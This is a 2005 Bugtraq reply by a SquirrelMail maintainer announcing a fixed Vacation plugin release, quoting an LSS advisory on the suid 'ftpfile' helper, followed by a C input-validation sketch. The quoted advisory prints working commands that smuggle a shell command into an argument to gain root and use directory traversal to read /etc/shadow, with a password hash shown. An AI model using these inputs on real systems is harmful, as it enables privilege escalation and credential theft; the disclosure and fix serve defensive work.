Message-ID: <4202F66B.7000408@angrynerds.com>
Date: Thu, 03 Feb 2005 20:13:31 -0800
From: p dont think <pdontthink@...rynerds.com>
To: LSS Security <exposed@....hr>
Cc: bugtraq@...urityfocus.com
Subject: Re: Squirrelmail vacation v0.15 local root exploit
All,
A new release of this plugin that addresses this exploit is now
available at:
http://www.squirrelmail.org/plugin_view.php?id=51
Due to the severity of the exploits in prior versions, upgrade is
highly recommended. Also, please keep in mind that while the
SquirrelMail team takes security very seriously, it cannot take full
responsibility for the plethora of third-party plugins, of which this is
one. LSS team: pleeeease let us know *before* you are going to make
your announcement next time.
- Paul Lesneiwski
> LSS Security Advisory #LSS-2005-01-03
> http://security.lss.hr
>
> ---
>
> Title : Squirrelmail vacation v0.15 local root exploit
> Advisory ID : LSS-2005-01-03
> Date : 10.01.2005.
> Advisory URL : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
> Impact : Privilege escalation and arbitrary file read
> Risk level : High
> Vulnerability type : Local
> Vendors contacted : No response from vendor
>
>
> ---
>
>
>
> ===[ Overview
>
> Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
> message to incoming email. That is commonly used to notify the sender of
> the receiver's absence. Vacation plugin specifically uses the Vacation program.
> Plugin can be downloaded from:
> http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz
>
>
>
> ===[ Vulnerability
>
> Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.
> The program is used to access local files in user's home directory. There is
> a privilege escalation and arbitrary file read vulnerability in ftpfile.
> Command line arguments are passed to execve() function without checking
> for meta-characters, therefore making possible execution of commands as root.
>
> [ljuranic@...top ljuranic]$ id
> uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
> [ljuranic@...top ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"
> /bin/cp: omitting directory `/root/0'
> uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
> [ljuranic@...top ljuranic]$
>
> It is also possible to read restricted files (such as /etc/shadow), since
> ftpfile can copy a file from user's home directory to any other
> directory without checking file name for directory traversal attack.
>
> $ ftpfile localhost root root get ../../../../etc/shadow ./shadow
> ./shadow[ljuranic@...top ljuranic]$ head ./shadow
> root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
> bin:*:10929:0:99999:7:::
> daemon:*:10929:0:99999:7:::
> lp:*:10929:0:99999:7:::
> [ljuranic@...top ljuranic]$
>
>
>
> ===[ Affected versions
>
> Squirrelmail Vacation v0.15 and previous versions.
>
>
>
> ===[ Fix
>
> Not available yet.
>
>
>
> ===[ PoC Exploit
>
> http://security.lss.hr/exploits/
>
>
>
> ===[ Credits
>
> Credit for this vulnerability goes to Leon Juranic.
>
>
>
> ===[ LSS Security Contact
>
> LSS Security Team, <eXposed by LSS>
>
> WWW : http://security.lss.hr
> E-mail : security@....hr
> Tel : +385 1 6129 775
>
>
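
The advisory quoted above names two missing input checks in a suid helper: shell meta-characters and directory traversal in file-name arguments. The following C sketch of such a check is an added example, not the plugin's code and not the fix shipped in the new release; `safe_relative_name` is a hypothetical name, and the character allowlist is an assumption about which file names a vacation helper needs to handle.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical validator (added example, not plugin code): returns 1 when
 * `name` is acceptable as a file name relative to a user's home directory,
 * 0 otherwise. Intended to run before a privileged helper touches the file. */
int safe_relative_name(const char *name)
{
    const char *p, *seg;
    size_t len;

    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len > 255)
        return 0;
    /* No absolute paths, and no leading '-' that a tool could read as an option. */
    if (name[0] == '/' || name[0] == '-')
        return 0;

    /* Allowlist rather than blocklist: letters, digits, '.', '_', '-', '/'.
     * This rejects ';', '|', '&', '$', backticks, quotes, spaces and newlines. */
    for (p = name; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-' || c == '/'))
            return 0;
    }

    /* Walk the path components and reject empty, "." and ".." segments,
     * so the name cannot climb out of the home directory. */
    seg = name;
    for (;;) {
        const char *slash = strchr(seg, '/');
        size_t n = slash ? (size_t)(slash - seg) : strlen(seg);

        if (n == 0)
            return 0;
        if (n == 1 && seg[0] == '.')
            return 0;
        if (n == 2 && seg[0] == '.' && seg[1] == '.')
            return 0;
        if (slash == NULL)
            break;
        seg = slash + 1;
    }
    return 1;
}
```

String validation is only one layer: a helper of this kind should also drop to the target user's uid before opening files and copy with open()/read()/write() instead of handing the arguments to a shell.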